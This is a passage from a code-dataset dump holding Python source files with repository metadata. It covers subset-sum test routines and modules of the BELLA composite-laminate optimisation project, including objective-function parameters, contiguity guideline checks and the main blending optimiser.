t, n, w )\r\n#\r\n# Problem #2.\r\n#\r\n t = 5842\r\n n = 10\r\n w = np.array ( [ 267, 493, 869, 961, 1000, 1153, 1246, 1598, 1766, 1922 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Problem #3.\r\n#\r\n t = 2463098\r\n n = 21\r\n w = np.array ( [ \\\r\n 518533, 1037066, 2074132, 1648264, 796528, \\\r\n 1593056, 686112, 1372224, 244448, 488896, \\\r\n 977792, 1955584, 1411168, 322336, 644672, \\\r\n 1289344, 78688, 157376, 314752, 629504, \\\r\n 1259008 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Problem #4.\r\n#\r\n t = 50\r\n n = 10\r\n w = np.array ( [ 41, 34, 21, 20, 8, 7, 7, 4, 3, 3 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Problem #5.\r\n#\r\n t = 100\r\n n = 9\r\n w = np.array ( [ 81, 80, 43, 40, 30, 26, 12, 11, 9 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Problem #6.\r\n#\r\n t = 22\r\n n = 6\r\n w = np.array ( [ 1, 2, 4, 8, 16, 32 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Problem #7.\r\n#\r\n t = 50\r\n n = 10\r\n w = np.array ( [ 25, 27, 3, 12, 6, 15, 9, 30, 21, 19 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_TABLE_TESTS:' )\r\n print ( ' Normal end of execution.' )\r\n return\r\n\r\ndef subset_sum_table_to_list ( t, table ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_TABLE_TO_LIST converts a subset sum table to a list.\r\n#\r\n# Discussion:\r\n#\r\n# The subset sum problem seeks to construct the value T by summing a\r\n# subset of the values W.\r\n#\r\n# This function takes a table computed by subset_sum_table() and converts\r\n# it to the corresponding list of values that form the sum.\r\n#\r\n# Example:\r\n#\r\n# w = [ 1, 2, 4, 8, 16, 32 ]\r\n# t = 22\r\n#\r\n# table = subset_sum ( w, t, r )\r\n# table = [ 1, 2, 2, 4, 4, 4, 4, 8, 8, 8, 8, 8, 8, 8, 8,\r\n# 16, 16, 16, 16, 16, 16, 16 ]\r\n#\r\n# index = subset_sum_table_to_list ( t, table )\r\n# index = [ 2, 4, 16 ]\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 11 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n# Input, integer TABLE(T), the subset sum table.\r\n#\r\n# Output, integer M, the number of items in the list.\r\n#\r\n# Output, integer INDEX(M), the list of weights that form the sum.\r\n# If no solution was found, then INDEX is an empty list.\r\n#\r\n index = []\r\n\r\n m = 0\r\n i = t\r\n while ( 0 < i ):\r\n index.append ( table[i] )\r\n i = i - table[i]\r\n m = m + 1\r\n\r\n return m, index\r\n\r\ndef timestamp ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## TIMESTAMP prints the date as a timestamp.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 06 April 2013\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# None\r\n#\r\n import time\r\n\r\n t = time.time ( )\r\n print ( time.ctime ( t ) )\r\n\r\n return None\r\n\r\ndef timestamp_test ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## TIMESTAMP_TEST tests TIMESTAMP.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 03 December 2014\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# None\r\n#\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'TIMESTAMP_TEST:' )\r\n print ( ' Python version: %s' % ( platform.python_version ( ) ) )\r\n print ( ' TIMESTAMP prints a timestamp of the current date and time.' )\r\n print ( '' )\r\n\r\n timestamp ( )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'TIMESTAMP_TEST:' )\r\n print ( ' Normal end of execution.' )\r\n return\r\n\r\ndef subset_sum_test ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_TEST tests the SUBSET_SUM library.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 16 July 2017\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'SUBSET_SUM_TEST:' )\r\n print ( ' Python version: %s' % ( platform.python_version ( ) ) )\r\n print ( ' Test the SUBSET_SUM library.' )\r\n\r\n# subset_next_test ( )\r\n# subset_sum_count_tests ( )\r\n subset_sum_find_tests ( )\r\n# subset_sum_next_tests ( )\r\n# subset_sum_table_tests ( )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_TEST:' )\r\n print ( ' Normal end of execution.' )\r\n return\r\n\r\nif ( __name__ == '__main__' ):\r\n timestamp ( )\r\n subset_sum_test ( )\r\n timestamp ( )\r\n\r\n"
},
{
"alpha_fraction": 0.5677981376647949,
"alphanum_fraction": 0.5810492038726807,
"avg_line_length": 33.08917236328125,
"blob_id": "c0cb0867822a4a19e57c07239540be7ff92a8ab4",
"content_id": "ee4a89f05be6cc3381fe55b174d9be4797b4cf03",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5509,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 157,
"path": "/src/BELLA/obj_function.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for the objective function parameters\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\n\r\nclass ObjFunction():\r\n \" An object for storing the objective function parameters\"\r\n\r\n def __init__(\r\n self,\r\n constraints,\r\n coeff_diso=0,\r\n coeff_contig=0,\r\n coeff_10=0,\r\n coeff_bal_ipo=1,\r\n coeff_oopo=1,\r\n coeff_spacing=1,\r\n n_modes=1):\r\n \"Initialise the objective function parameters\"\r\n\r\n # number of buckling modes to be tested\r\n self.n_modes = n_modes\r\n if not isinstance(n_modes, int):\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nAttention, n_modes must be an integer!\"\"\")\r\n if n_modes < 1:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nAttention, n_modes must be strictly positive!\"\"\")\r\n\r\n ### 10% rule\r\n if not constraints.rule_10_percent:\r\n self.coeff_10 = 0\r\n else:\r\n self.coeff_10 = coeff_10\r\n if not isinstance(coeff_10, (float, int)):\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nAttention, coeff_10 must be a number (float or integer)!\"\"\")\r\n if coeff_10 < 0:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of penalty for the 10% rule must be a positive!\"\"\")\r\n\r\n ### balance\r\n if not constraints.bal:\r\n self.coeff_bal_ipo = 0\r\n else:\r\n self.coeff_bal_ipo = coeff_bal_ipo\r\n if not isinstance(coeff_bal_ipo, (float, int)):\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nAttention, coeff_bal_ipo must be a number (float or integer)!\"\"\")\r\n if coeff_bal_ipo < 0:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of penalty for in-plane orthotropy must be a positive!\"\"\")\r\n\r\n ### out-of-plane orthotropy\r\n if not constraints.oopo:\r\n self.coeff_oopo = 0\r\n else:\r\n self.coeff_oopo = coeff_oopo\r\n if not isinstance(coeff_oopo, (float, int)):\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nAttention, coeff_oopo must be a number (float or integer)!\"\"\")\r\n if coeff_oopo < 0:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of penalty for out-of-plane orthotropy must be a positive!\"\"\")\r\n\r\n ### contiguity rule\r\n if not constraints.contig:\r\n self.coeff_contig = 0\r\n else:\r\n self.coeff_contig = coeff_contig\r\n if coeff_contig < 0:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of the contiguity constraint penalty must be a positive!\"\"\")\r\n\r\n ### disorientation rule\r\n if not constraints.diso:\r\n self.coeff_diso = 0\r\n else:\r\n self.coeff_diso = coeff_diso\r\n if coeff_diso < 0:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of the disorientation constraint penalty must be a positive!\"\"\")\r\n\r\n\r\n ### ply drop spacing guideline\r\n if not constraints.pdl_spacing:\r\n self.coeff_spacing = 0\r\n else:\r\n self.coeff_spacing = coeff_spacing\r\n if not isinstance(coeff_spacing, (float, int)):\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of penalty for the ply drop spacing guideline must be a number!\"\"\")\r\n if coeff_spacing < 0:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of penalty for the ply drop spacing guideline must be positive!\"\"\")\r\n\r\n# ### ply-drop guidelines\r\n# ### weight of the panel boundaries when calculating ply-drop layout\r\n# # penalties\r\n# # 1 for boundaries of level 1\r\n# # 1 - coeff for boundaries of level 2\r\n# # 1 - 2 * coeff for boundaries of level 3 ...\r\n# if not constraints.pdl_spacing:\r\n# self.coeff_panel_pdls = 0\r\n# else:\r\n# self.coeff_panel_pdls = coeff_panel_pdls\r\n\r\n\r\n def set_initial_panel_weightings(self, multipanel):\r\n \"\"\"\r\n to set the initial panel weightings\r\n \"\"\"\r\n self.reduced_panel_weightings \\\r\n = np.array([p.weighting for p in multipanel.reduced.panels])\r\n\r\n self.panel_weightings_ini \\\r\n = np.array([p.weighting for p in multipanel.panels])\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n\r\n return f\"\"\"\r\nNumber of buckling modes to be tested if buckling minimisation problem: {self.n_modes}\r\n\r\nPenalty coefficients:\r\n - for the disorientation rule: {self.coeff_diso}\r\n - for the contiguity rule: {self.coeff_contig}\r\n - for the 10% rule: {self.coeff_10}\r\n - for balance: {self.coeff_bal_ipo}\r\n - for out-of-plane orthotropy: {self.coeff_oopo}\r\n - for the ply drop spacing guideline: {self.coeff_spacing}\r\n\"\"\"\r\n# - for the weight of the panel boundaries when calculating ply-drop layout\r\n# penalties: {self.coeff_panel_pdls}\r\n\r\n\r\nclass ObjFunctionDefinitionError(Exception):\r\n \"\"\" Error during parameter definition\"\"\"\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n sys.path.append(r'C:\\BELLA')\r\n from src.BELLA.constraints import Constraints\r\n constraints = Constraints(sym=True)\r\n constraints.bal = True\r\n constraints.oopo = True\r\n obj_func_param = ObjFunction(\r\n constraints=constraints,\r\n lampam_weightings=np.array([0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1]),\r\n coeff_bal_ipo=1000,\r\n coeff_oopo=20)\r\n print(obj_func_param)\r\n"
},
{
"alpha_fraction": 0.3899224102497101,
"alphanum_fraction": 0.4085257649421692,
"avg_line_length": 36.31182861328125,
"blob_id": "3f8c8a6b944484e6e796e952da9e18a381f4a7ad",
"content_id": "a22a35f2e70a3d4d57f087711ede517885735326",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10697,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 279,
"path": "/src/guidelines/internal_contig.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunction to check the feasibility of laminate lay-ups for the contiguity design\r\nguideline.\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\ndef internal_contig2(stack, constraints):\r\n '''\r\n returns True if a laminate lay-up staisfy the contiguity design guideline,\r\n False otherwise\r\n\r\n INPUTS\r\n\r\n - stack: the laminate stacking sequence\r\n - constraints: the set of constraints\r\n '''\r\n if stack.ndim == 2:\r\n stack = stack.reshape((stack.size, ))\r\n\r\n if not constraints.contig:\r\n return True\r\n\r\n if constraints.n_contig < stack.size:\r\n diff = stack.size - constraints.n_contig\r\n\r\n if constraints.n_contig == 2:\r\n for jj in np.arange(diff):\r\n if stack[jj]==stack[jj + 1] \\\r\n and stack[jj]==stack[jj + 2]:\r\n return False\r\n\r\n elif constraints.n_contig == 3:\r\n for jj in np.arange(diff):\r\n if stack[jj]==stack[jj + 1] \\\r\n and stack[jj]==stack[jj + 2] \\\r\n and stack[jj]==stack[jj + 3]:\r\n return False\r\n\r\n elif constraints.n_contig == 4:\r\n for jj in np.arange(diff):\r\n if stack[jj]==stack[jj + 1] \\\r\n and stack[jj]==stack[jj + 2] \\\r\n and stack[jj]==stack[jj + 3] \\\r\n and stack[jj]==stack[jj + 4]:\r\n return False\r\n\r\n elif constraints.n_contig == 5:\r\n for jj in np.arange(diff):\r\n if stack[jj]==stack[jj + 1] \\\r\n and stack[jj]==stack[jj + 2] \\\r\n and stack[jj]==stack[jj + 3] \\\r\n and stack[jj]==stack[jj + 4] \\\r\n and stack[jj]==stack[jj + 5]:\r\n return False\r\n\r\n elif constraints.n_contig == 6:\r\n for jj in np.arange(diff):\r\n if stack[jj]==stack[jj + 1] \\\r\n and stack[jj]==stack[jj + 2] \\\r\n and stack[jj]==stack[jj + 3] \\\r\n and stack[jj]==stack[jj + 4] \\\r\n and stack[jj]==stack[jj + 5] \\\r\n and stack[jj]==stack[jj + 6]:\r\n return False\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n return True\r\n\r\n\r\ndef internal_contig(angle, constraints, angle2=None):\r\n '''\r\nreturns only the stacking sequences that satisfy the contiguity rule\r\n\r\nOUTPUTS\r\n\r\n- angle: the selected sublaminate stacking sequences line by\r\nline\r\n- angle2: the selected sublaminate stacking sequences line by\r\nline if a second sublaminate is given as input for angle2\r\n\r\nINPUTS\r\n\r\n- angle: the first sublaminate stacking sequences\r\n- angle:2 matrix storing the second sublaminate stacking sequences\r\n\r\n '''\r\n if angle.ndim == 1:\r\n angle = angle.reshape((1, angle.size))\r\n n_plies_group = angle.shape[1]\r\n\r\n # TO ENSURE CONTIGUITY\r\n if constraints.contig:\r\n # To ensure the contiguity constraint within groups of plies\r\n\r\n if not angle2 is None:\r\n\r\n if constraints.n_contig < n_plies_group:\r\n diff = n_plies_group-constraints.n_contig\r\n\r\n if constraints.n_contig == 2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj + 2]==angle[ii, jj + 1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n angle2 = np.delete(angle2, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 3:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj + 2]==angle[ii, jj + 1] \\\r\n and angle[ii, jj + 3]==angle[ii, jj + 1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n angle2 = np.delete(angle2, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 4:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj + 2]==angle[ii, jj + 1] \\\r\n and angle[ii, jj + 2]==angle[ii, jj + 3] \\\r\n and angle[ii, jj]==angle[ii, jj + 4]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n angle2 = np.delete(angle2, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2] \\\r\n and angle[ii, jj]==angle[ii, jj + 3] \\\r\n and angle[ii, jj]==angle[ii, jj + 4] \\\r\n and angle[ii, jj]==angle[ii, jj + 5]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n angle2 = np.delete(angle2, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2] \\\r\n and angle[ii, jj]==angle[ii, jj + 3] \\\r\n and angle[ii, jj]==angle[ii, jj + 4] \\\r\n and angle[ii, jj]==angle[ii, jj + 5] \\\r\n and angle[ii, jj]==angle[ii, jj + 6]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n angle2 = np.delete(angle2, np.s_[ii], axis=0)\r\n break\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n\r\n else:\r\n\r\n if constraints.n_contig < n_plies_group:\r\n diff = n_plies_group-constraints.n_contig\r\n\r\n if constraints.n_contig == 2:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 3:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2] \\\r\n and angle[ii, jj]==angle[ii, jj + 3]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 4:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2] \\\r\n and angle[ii, jj]==angle[ii, jj + 3] \\\r\n and angle[ii, jj]==angle[ii, jj + 4]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2] \\\r\n and angle[ii, jj]==angle[ii, jj + 3] \\\r\n and angle[ii, jj]==angle[ii, jj + 4] \\\r\n and angle[ii, jj]==angle[ii, jj + 5]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2] \\\r\n and angle[ii, jj]==angle[ii, jj + 3] \\\r\n and angle[ii, jj]==angle[ii, jj + 4] \\\r\n and angle[ii, jj]==angle[ii, jj + 5] \\\r\n and angle[ii, jj]==angle[ii, jj + 6]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n break\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n return angle, angle2\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 'Test'\r\n\r\n import sys\r\n sys.path.append(r'C:\\BELLA')\r\n from src.LAYLA_V02.constraints import Constraints\r\n from src.divers.pretty_print import print_list_ss\r\n\r\n constraints = Constraints()\r\n constraints.contig = True\r\n constraints.n_contig = 5\r\n\r\n print('*** Test for the function internal_contig ***\\n')\r\n print('Input stacking sequences:\\n')\r\n ss = np.array([[0, 0, 45, 0, 0, 45, 90, 0, 45, 90],\r\n [0, 0, 0, 0, 0, 0, 90, 90, 45, 90],\r\n [0, 0, 0, 0, 0, 0, 90, 90, 45, 90]])\r\n print_list_ss(ss)\r\n test = internal_contig(ss, constraints)[0]\r\n if test.shape[0]:\r\n print('Stacking sequences satisfying the rule:\\n')\r\n print_list_ss(test)\r\n else:\r\n print('No stacking sequence satisfy the rule\\n')\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6684402823448181,
"alphanum_fraction": 0.6725972890853882,
"avg_line_length": 36.79999923706055,
"blob_id": "67d43cb4a4d31639a1b04c30f7a12d2a546a315d",
"content_id": "b8d152e3ed4510fb82600fcb6bbe5a5ac3b04aa3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6014,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 155,
"path": "/src/BELLA/optimiser.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nOptimisation of a composite laminate design\r\n\"\"\"\r\n\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport time\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.results import BELLA_Results\r\n#from src.BELLA.divide_panels_1 import divide_panels_1\r\nfrom src.BELLA.pdl_ini import create_initial_pdls, check_pdls_ini\r\nfrom src.BELLA.divide_panels import divide_panels\r\nfrom src.BELLA.ply_order import calc_ply_order\r\nfrom src.BELLA.moments_of_areas import calc_mom_of_areas\r\nfrom src.BELLA.lampam_matrix import calc_delta_lampams\r\nfrom src.BELLA.optimiser_with_one_pdl import BELLA_optimiser_one_pdl\r\nfrom src.BELLA.save_set_up import save_constraints_BELLA, save_parameters_BELLA\r\nfrom src.BELLA.save_set_up import save_multipanel, save_objective_function_BELLA\r\nfrom src.BELLA.save_set_up import save_materials\r\nfrom src.BELLA.save_result import save_result_BELLAs\r\nfrom src.divers.excel import autofit_column_widths, delete_file\r\nfrom src.BELLA.format_pdl import extend_after_guide_based_blending\r\nfrom src.BELLA.pdl_ini import read_pdls_excel\r\n\r\ndef BELLA_optimiser(\r\n multipanel, parameters, obj_func_param, constraints, filename,\r\n mat=None, filename_initial_pdls=None):\r\n \"\"\"\r\n performs the retrieval of blended stacking sequences from\r\n lamination-parameter targets\r\n\r\n - BELLA_results: results of the optimisation\r\n\r\n INPUTS\r\n\r\n - parameters: parameters of the optimiser\r\n - constraints: lay-up design guidelines\r\n - obj_func_param: objective function parameters\r\n - targets: target lamination parameters and ply counts\r\n - mat: material properties\r\n - filename: name of the file where to save results\r\n - pdls_ini: initial ply-drop layouts (opyional)\r\n \"\"\"\r\n ### initialisation\r\n t0 =time.time()\r\n\r\n delete_file(filename)\r\n\r\n multipanel.should_you_use_BELLA()\r\n multipanel.calc_weight_per_panel(mat.density_area)\r\n multipanel.filter_target_lampams(constraints, obj_func_param)\r\n multipanel.filter_lampam_weightings(constraints, obj_func_param)\r\n\r\n ### step 1 of BELLA: mapping the multi-panel structure to a blending strip\r\n print('---- Blending step 1 ----')\r\n multipanel.from_mp_to_blending_strip(\r\n constraints, parameters.n_plies_ref_panel)\r\n\r\n ### step 2 of BELLA: generation of initial ply drop layouts\r\n print('---- Blending step 2 ----')\r\n\r\n if filename_initial_pdls is None:\r\n # creation of the initial ply drop layouts\r\n divide_panels(multipanel, parameters, constraints)\r\n pdls_ini = create_initial_pdls(\r\n multipanel, constraints, parameters, obj_func_param)\r\n else:\r\n # read initial ply-drop layouts\r\n pdls_ini = read_pdls_excel(filename_initial_pdls)\r\n # number of initial ply drops to be tested\r\n parameters.n_ini_ply_drops = len(pdls_ini)\r\n # check the correct number of plies and panels in the ply drop layouts\r\n check_pdls_ini(multipanel, pdls_ini)\r\n\r\n ### preparation of the step 3 of BELLA\r\n\r\n # division of the plies of the panels into one ply group\r\n group_size_max = parameters.group_size_max\r\n parameters.group_size_max = 10000\r\n divide_panels(multipanel, parameters, constraints)\r\n parameters.group_size_max = group_size_max\r\n\r\n # initialisation of the results\r\n results = BELLA_Results(constraints, multipanel, parameters)\r\n\r\n # list of the orders in which plies are optimised in each panels\r\n ply_order = calc_ply_order(multipanel, constraints)\r\n# print('ply_order')\r\n# print(ply_order)\r\n\r\n # mom_areas_plus: positive ply moments of areas\r\n # mom_areas: ply moments of areas\r\n mom_areas_plus, mom_areas = calc_mom_of_areas(\r\n multipanel, constraints, ply_order)\r\n\r\n # calculation of ply partial lamination parameters\r\n delta_lampams = calc_delta_lampams(\r\n multipanel, constraints, mom_areas, ply_order)\r\n\r\n outer_step = 0\r\n\r\n while outer_step < parameters.n_ini_ply_drops:\r\n\r\n ### step 3 and 4 of BELLA: ply angle optimisation + laminate repair\r\n print('---- Blending step 3 ----')\r\n results_one_pdl = BELLA_optimiser_one_pdl(\r\n multipanel, parameters, obj_func_param, constraints, ply_order,\r\n mom_areas_plus, delta_lampams, pdls_ini[outer_step], mat=mat)\r\n\r\n results.update(outer_step, results_one_pdl)\r\n\r\n ## === If the stacking sequence is good enough, exit the loop\r\n if results_one_pdl is not None:\r\n if abs(results_one_pdl.obj_constraints).all() < 1e-10:\r\n print(f\"\"\"Low objective for the outer step {outer_step}.\"\"\")\r\n break\r\n\r\n outer_step += 1\r\n\r\n # To determine the best solution\r\n ind_mini = np.argmin(results.obj_constraints_tab)\r\n\r\n results.ss = results.ss_tab[ind_mini]\r\n results.sst = results.ss_tab_tab[ind_mini]\r\n results.lampam = results.lampam_tab_tab[:, ind_mini, :]\r\n results.n_plies_per_angle = results.n_plies_per_angle_tab[ind_mini]\r\n results.obj_constraints = results.obj_constraints_tab[ind_mini]\r\n results.obj_no_constraints = results.obj_no_constraints_tab[ind_mini]\r\n results.ind_mini = ind_mini\r\n results.time = time.time() - t0\r\n\r\n # save data\r\n save_constraints_BELLA(filename, constraints)\r\n if mat is not None:\r\n save_materials(filename, mat)\r\n save_parameters_BELLA(filename, parameters)\r\n save_objective_function_BELLA(filename, obj_func_param)\r\n save_multipanel(filename, multipanel, obj_func_param, mat)\r\n\r\n pdls = np.zeros((len(pdls_ini),\r\n multipanel.n_panels,\r\n multipanel.n_plies_max))\r\n for ind in range(len(pdls_ini)):\r\n pdls[ind] = np.array(\r\n extend_after_guide_based_blending(multipanel, pdls_ini[ind]))\r\n save_result_BELLAs(filename, multipanel, constraints, parameters,\r\n obj_func_param, pdls, results, mat)\r\n autofit_column_widths(filename)\r\n\r\n return results\r\n"
},
{
"alpha_fraction": 0.5960389375686646,
"alphanum_fraction": 0.607819676399231,
"avg_line_length": 36.04545593261719,
"blob_id": "2174d80b90cded11517a084cc3bb3951d9f093b7",
"content_id": "ab1804db884ce2b1e00042f47fd233ffcb3fb13f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5857,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 154,
"path": "/src/BELLA/lampam_matrix.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nAll possible ply lamination parameters\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.CLA.lampam_functions import calc_delta_lampam_mp_3\r\nfrom src.CLA.lampam_functions import calc_delta_lampam\r\n\r\n\r\ndef calc_delta_lampams(multipanel, constraints, mom_areas, ply_order):\r\n \"\"\"\r\n calulates all ply partial lamination parameters in a multipanel structure\r\n\r\n INPUTS\r\n\r\n - multipanel: multi-panel structure\r\n - constraints: set of constraints\r\n - mom_areas[panel_index, ply_index, 0]:\r\n area of ply of index 'ply_index' in panel of index 'panel_index'\r\n - mom_areas[panel_index, ply_index, 1]:\r\n first moment of area of ply of index 'ply_index' in panel of index\r\n 'panel_index'\r\n - mom_areas[panel_index, ply_index, 2]:\r\n second moment of area of ply of index 'ply_index' in panel of index\r\n 'panel_index'\r\n - ply_order: ply indices sorted in the order in which plies are optimised\r\n \"\"\"\r\n delta_lampams = []\r\n\r\n\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n\r\n if constraints.sym:\r\n n_plies_panel = panel.n_plies // 2 + panel.n_plies % 2\r\n delta_lampams_panel = np.empty((\r\n n_plies_panel,\r\n constraints.n_set_of_angles,\r\n 12), float)\r\n for ind_ply in range(n_plies_panel):\r\n\r\n\r\n delta_lampams_panel[ind_ply, :, 0:4] \\\r\n = mom_areas[ind_panel][ind_ply, 0] * constraints.cos_sin\r\n delta_lampams_panel[ind_ply, :, 4:8] = 0\r\n delta_lampams_panel[ind_ply, :, 8:12] \\\r\n = mom_areas[ind_panel][ind_ply, 2] * constraints.cos_sin\r\n if panel.n_plies % 2 and ind_ply == panel.middle_ply_index:\r\n delta_lampams_panel[ind_ply, :, :] /= 2\r\n\r\n else:\r\n delta_lampams_panel = np.empty((\r\n panel.n_plies, constraints.n_set_of_angles,\r\n 12), float)\r\n for ind_ply in range(delta_lampams_panel.shape[0]):\r\n delta_lampams_panel[ind_ply, :, 0:4] \\\r\n = mom_areas[ind_panel][ind_ply, 0] * constraints.cos_sin\r\n delta_lampams_panel[ind_ply, :, 4:8] 